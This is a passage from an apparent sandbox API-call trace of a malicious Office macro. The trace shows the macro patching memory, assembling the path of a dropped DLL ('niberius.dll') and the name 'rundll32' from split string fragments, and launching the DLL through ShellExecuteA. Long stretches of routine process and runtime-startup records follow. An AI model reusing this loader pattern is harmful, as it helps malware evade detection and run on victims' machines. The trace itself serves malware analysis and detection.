lpflOldProtect=0x187554*=0x40) returned 1 [0161.447] GetCurrentProcess () returned 0xffffffff [0161.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7e1cdb6, dwSize=0xc) returned 1 [0161.447] VirtualProtect (in: lpAddress=0x7e1cdb6, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x187554 | out: lpflOldProtect=0x187554*=0x40) returned 1 [0161.447] GetCurrentProcess () returned 0xffffffff [0161.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7e1cdca, dwSize=0xc) returned 1 [0161.447] VirtualProtect (in: lpAddress=0x7e1cdca, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x187554 | out: lpflOldProtect=0x187554*=0x40) returned 1 [0161.448] GetCurrentProcess () returned 0xffffffff [0161.448] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7e1cdde, dwSize=0xc) returned 1 [0161.448] VirtualProtect (in: lpAddress=0x7e1cdde, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x187554 | out: lpflOldProtect=0x187554*=0x40) returned 1 [0161.449] GetAsyncKeyState (vKey=3) returned 0 [0161.449] VarBstrCat (in: bstrLeft="\\", bstrRight="niberius", pbstrResult=0x187fb0 | out: pbstrResult=0x187fb0) returned 0x0 [0161.449] VarBstrCat (in: bstrLeft="\\niberius", bstrRight=".dll", pbstrResult=0x187fb0 | out: pbstrResult=0x187fb0) returned 0x0 [0161.449] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates", bstrRight="\\niberius.dll", pbstrResult=0x187f84 | out: pbstrResult=0x187f84) returned 0x0 [0161.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates\\niberius.dll", cchWideChar=-1, lpMultiByteStr=0x187c6c, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates\\niberius.dll", lpUsedDefaultChar=0x0) returned 68 [0161.450] _fullpath (in: _FullPath=0x187ea8, _Path="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates\\niberius.dll", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates\\niberius.dll") returned="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates\\niberius.dll" [0161.450] _mbspbrk (_Str=0x187ea8, _Control=0x7554fa5c) returned 0x0 [0161.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\nimb.dll", cchWideChar=-1, lpMultiByteStr=0x187c6c, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\nimb.dll", lpUsedDefaultChar=0x0) returned 47 [0161.450] _fullpath (in: _FullPath=0x187da0, _Path="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\nimb.dll", _SizeInBytes=0x104 | out: _FullPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\nimb.dll") returned="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\nimb.dll" [0161.450] _mbspbrk (_Str=0x187da0, _Control=0x7554fa5c) returned 0x0 [0161.454] VarBstrCat (in: bstrLeft="l3", bstrRight="2", pbstrResult=0x188078 | out: pbstrResult=0x188078) returned 0x0 [0161.454] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates", bstrRight="\\niberius.d", pbstrResult=0x188070 | out: pbstrResult=0x188070) returned 0x0 [0161.454] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates\\niberius.d", bstrRight="ll,UBISYAYMQSE", pbstrResult=0x188070 | out: pbstrResult=0x188070) returned 0x0 [0161.454] SysStringLen (param_1="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates\\niberius.dll,UBISYAYMQSE") returned 0x4f [0161.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates\\niberius.dll,UBISYAYMQSE", cchWideChar=79, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 79 [0161.454] SysStringLen (param_1="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates\\niberius.dll,UBISYAYMQSE") returned 0x4f [0161.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates\\niberius.dll,UBISYAYMQSE", cchWideChar=80, lpMultiByteStr=0x7f8526c, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates\\niberius.dll,UBISYAYMQSE", lpUsedDefaultChar=0x0) returned 80 [0161.454] VarBstrCat (in: bstrLeft="rundl", bstrRight="l32", pbstrResult=0x18806c | out: pbstrResult=0x18806c) returned 0x0 [0161.454] SysStringLen (param_1="rundll32") returned 0x8 [0161.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="rundll32", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0161.454] SysStringLen (param_1="rundll32") returned 0x8 [0161.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="rundll32", cchWideChar=9, lpMultiByteStr=0x7df01fc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rundll32", lpUsedDefaultChar=0x0) returned 9 [0161.454] SetErrorMode (uMode=0x8001) returned 0x8001 [0161.454] _stricmp (_Str1="shell32", _Str2="VBE6.DLL") returned -3 [0161.454] LoadLibraryA (lpLibFileName="shell32") returned 0x75740000 [0161.455] SetErrorMode (uMode=0x8001) returned 0x8001 [0161.456] GetProcAddress (hModule=0x75740000, lpProcName="ShellExecuteA") returned 0x75987078 [0161.461] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="rundll32", lpParameters="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates\\niberius.dll,UBISYAYMQSE", lpDirectory=0x0, nShowCmd=1) returned 0x2a [0161.776] NtdllDefWindowProc_A (hWnd=0x1033a, Msg=0xc1ea, wParam=0x50, lParam=0x0) returned 0x0 [0161.783] NtdllDefWindowProc_A (hWnd=0x1033a, Msg=0xc1ea, wParam=0x52, lParam=0x1) returned 0x0 [0164.220] GetLastError () returned 0x0 [0164.220] GetAsyncKeyState (vKey=3) returned 0 Thread: id = 15 os_tid = 0xe88 Thread: id = 68 os_tid = 0xf00 [0161.473] WrapperThreadProc () Thread: id = 71 os_tid = 0xf2c Thread: id = 72 os_tid = 0xf3c Thread: id = 73 os_tid = 0xf40 Thread: id = 88 os_tid = 0xfe4 Thread: id = 89 os_tid = 0xfe8 Thread: id = 91 os_tid = 0xb54 Thread: id = 93 os_tid = 0xb64 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x76c83000" os_pid = "0x364" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d070" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 16 os_tid = 0xd0c Thread: id = 17 os_tid = 0xa24 Thread: id = 18 os_tid = 0x40c Thread: id = 19 os_tid = 0x1cc Thread: id = 20 os_tid = 0x2bc Thread: id = 21 os_tid = 0x410 Thread: id = 22 os_tid = 0x6b8 Thread: id = 23 os_tid = 0x6d8 Thread: id = 24 os_tid = 0x2fc Thread: id = 25 os_tid = 0x4bc Thread: id = 26 os_tid = 0x228 Thread: id = 27 os_tid = 0x1b8 Thread: id = 28 os_tid = 0x41c Thread: id = 29 os_tid = 0x420 Thread: id = 30 os_tid = 0x788 Thread: id = 31 os_tid = 0x784 Thread: id = 32 os_tid = 0x760 Thread: id = 33 os_tid = 0x72c Thread: id = 34 os_tid = 0x71c Thread: id = 35 os_tid = 0x6f8 Thread: id = 36 os_tid = 0x6dc Thread: id = 37 os_tid = 0x6bc Thread: id = 38 os_tid = 0x6ac Thread: id = 39 os_tid = 0x698 Thread: id = 40 os_tid = 0x4a0 Thread: id = 41 os_tid = 0x49c Thread: id = 42 os_tid = 0x48c Thread: id = 43 os_tid = 0x488 Thread: id = 44 os_tid = 0x484 Thread: id = 45 os_tid = 0x120 Thread: id = 46 os_tid = 0x168 Thread: id = 47 os_tid = 0x3f0 Thread: id = 48 os_tid = 0x3e8 Thread: id = 49 os_tid = 0x3dc Thread: id = 50 os_tid = 0x384 Thread: id = 51 os_tid = 0x37c Thread: id = 52 os_tid = 0x370 Thread: id = 53 os_tid = 0x368 Thread: id = 54 os_tid = 0xec0 Thread: id = 55 os_tid = 0xec4 Thread: id = 56 os_tid = 0xec8 Thread: id = 57 os_tid = 0xecc Thread: id = 58 os_tid = 0xed0 Thread: id = 59 os_tid = 0xed4 Thread: id = 60 os_tid = 0xed8 Thread: id = 70 os_tid = 0xf1c Thread: id = 74 os_tid = 0xf44 Thread: id = 90 os_tid = 0xb84 Thread: id = 94 os_tid = 0xab8 Thread: id = 95 os_tid = 0xac0 Process: id = "3" image_name = "splwow64.exe" filename = "c:\\windows\\splwow64.exe" page_root = "0x306dc000" os_pid = "0xedc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xdd0" cmd_line = "C:\\Windows\\splwow64.exe 8192" cur_dir = "C:\\Windows\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e32c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 61 os_tid = 0xee0 Thread: id = 62 os_tid = 0xee4 Thread: id = 63 os_tid = 0xee8 Thread: id = 64 os_tid = 0xeec Thread: id = 65 os_tid = 0xef0 Thread: id = 66 os_tid = 0xef4 Thread: id = 67 os_tid = 0xef8 Thread: id = 92 os_tid = 0xb68 Thread: id = 96 os_tid = 0xacc Process: id = "4" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x2f5c7000" os_pid = "0xf04" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xdd0" cmd_line = "C:\\Windows\\SysWOW64\\rundll32.exe c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates\\niberius.dll,UBISYAYMQSE" cur_dir = "C:\\Users\\kEecfMwgj\\Documents\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e32c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 69 os_tid = 0xf08 [0166.934] GetProcessHeap () returned 0x5d0000 [0166.935] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77350000 [0166.935] GetProcAddress (hModule=0x77350000, lpProcName="FlsAlloc") returned 0x77364f2b [0166.935] GetProcAddress (hModule=0x77350000, lpProcName="FlsFree") returned 0x7736359f [0166.936] GetProcAddress (hModule=0x77350000, lpProcName="FlsGetValue") returned 0x77361252 [0166.936] GetProcAddress (hModule=0x77350000, lpProcName="FlsSetValue") returned 0x77364208 [0166.936] GetProcAddress (hModule=0x77350000, lpProcName=0x64f7dff8) returned 0x77364d28 [0166.936] GetProcAddress (hModule=0x77350000, lpProcName="CreateEventExW") returned 0x773e410b [0166.936] GetProcAddress (hModule=0x77350000, lpProcName="CreateSemaphoreExW") returned 0x773e4195 [0166.936] GetProcAddress (hModule=0x77350000, lpProcName="SetThreadStackGuarantee") returned 0x7736d31f [0166.936] GetProcAddress (hModule=0x77350000, lpProcName="CreateThreadpoolTimer") returned 0x7737ee7e [0166.936] GetProcAddress (hModule=0x77350000, lpProcName="SetThreadpoolTimer") returned 0x77bb441c [0166.937] GetProcAddress (hModule=0x77350000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77bdc50e [0166.937] GetProcAddress (hModule=0x77350000, lpProcName="CloseThreadpoolTimer") returned 0x77bdc381 [0166.937] GetProcAddress (hModule=0x77350000, lpProcName="CreateThreadpoolWait") returned 0x7737f088 [0166.937] GetProcAddress (hModule=0x77350000, lpProcName="SetThreadpoolWait") returned 0x77bc05d7 [0166.937] GetProcAddress (hModule=0x77350000, lpProcName="CloseThreadpoolWait") returned 0x77bdca24 [0166.937] GetProcAddress (hModule=0x77350000, lpProcName="FlushProcessWriteBuffers") returned 0x77b90b8c [0166.937] GetProcAddress (hModule=0x77350000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77c4fde8 [0166.937] GetProcAddress (hModule=0x77350000, lpProcName="GetCurrentProcessorNumber") returned 0x77be1e1d [0166.938] GetProcAddress (hModule=0x77350000, lpProcName="GetLogicalProcessorInformation") returned 0x773e4761 [0166.938] GetProcAddress (hModule=0x77350000, lpProcName="CreateSymbolicLinkW") returned 0x773dcd11 [0166.938] GetProcAddress (hModule=0x77350000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0166.938] GetProcAddress (hModule=0x77350000, lpProcName="EnumSystemLocalesEx") returned 0x773e424f [0166.938] GetProcAddress (hModule=0x77350000, lpProcName="CompareStringEx") returned 0x773e46b1 [0166.938] GetProcAddress (hModule=0x77350000, lpProcName="GetDateFormatEx") returned 0x773f6676 [0166.938] GetProcAddress (hModule=0x77350000, lpProcName="GetLocaleInfoEx") returned 0x773e4751 [0166.938] GetProcAddress (hModule=0x77350000, lpProcName="GetTimeFormatEx") returned 0x773f65f1 [0166.938] GetProcAddress (hModule=0x77350000, lpProcName="GetUserDefaultLocaleName") returned 0x773e47c1 [0166.938] GetProcAddress (hModule=0x77350000, lpProcName="IsValidLocaleName") returned 0x773e47e1 [0166.939] GetProcAddress (hModule=0x77350000, lpProcName="LCMapStringEx") returned 0x773e47f1 [0166.939] GetProcAddress (hModule=0x77350000, lpProcName="GetCurrentPackageId") returned 0x0 [0166.939] GetProcAddress (hModule=0x77350000, lpProcName="GetTickCount64") returned 0x7737eee0 [0166.939] GetProcAddress (hModule=0x77350000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0166.939] GetProcAddress (hModule=0x77350000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0166.940] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3bc) returned 0x649fd8 [0166.940] GetCurrentThreadId () returned 0xf08 [0166.940] GetCommandLineA () returned="C:\\Windows\\SysWOW64\\rundll32.exe c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates\\niberius.dll,UBISYAYMQSE" [0166.940] GetEnvironmentStringsW () returned 0x659bf8* [0166.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1547, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1547 [0166.940] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x60b) returned 0x6722d0 [0166.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1547, lpMultiByteStr=0x6722d0, cbMultiByte=1547, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1547 [0166.941] FreeEnvironmentStringsW (penv=0x659bf8) returned 1 [0166.941] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x18) returned 0x625b88 [0166.941] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x800) returned 0x642390 [0166.941] GetStartupInfoW (in: lpStartupInfo=0x14f77c | out: lpStartupInfo=0x14f77c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\SysWOW64\\rundll32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x659bf8, hStdOutput=0x6722d0, hStdError=0x659bf0)) [0166.941] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0166.941] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0166.941] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0166.941] GetLastError () returned 0x7f [0166.941] SetLastError (dwErrCode=0x7f) [0166.941] GetLastError () returned 0x7f [0166.941] SetLastError (dwErrCode=0x7f) [0166.941] GetLastError () returned 0x7f [0166.941] SetLastError (dwErrCode=0x7f) [0166.941] GetACP () returned 0x4e4 [0166.941] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x220) returned 0x644430 [0166.941] GetLastError () returned 0x7f [0166.941] SetLastError (dwErrCode=0x7f) [0166.941] IsValidCodePage (CodePage=0x4e4) returned 1 [0166.941] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f780 | out: lpCPInfo=0x14f780) returned 1 [0166.941] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f248 | out: lpCPInfo=0x14f248) returned 1 [0166.941] GetLastError () returned 0x7f [0166.941] SetLastError (dwErrCode=0x7f) [0166.942] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f65c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0166.942] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f65c, cbMultiByte=256, lpWideCharStr=0x14efc8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ駎擶Ā") returned 256 [0166.942] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ駎擶Ā", cchSrc=256, lpCharType=0x14f25c | out: lpCharType=0x14f25c) returned 1 [0166.942] GetLastError () returned 0x7f [0166.942] SetLastError (dwErrCode=0x7f) [0166.942] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f65c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0166.942] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f65c, cbMultiByte=256, lpWideCharStr=0x14ef98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᑄ擶Ā") returned 256 [0166.942] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᑄ擶Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0166.942] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᑄ擶Ā", cchSrc=256, lpDestStr=0x14ed88, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0166.942] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x14f55c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x836\x86K\x98÷\x14", lpUsedDefaultChar=0x0) returned 256 [0166.942] GetLastError () returned 0x7f [0166.942] SetLastError (dwErrCode=0x7f) [0166.942] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f65c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0166.942] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, 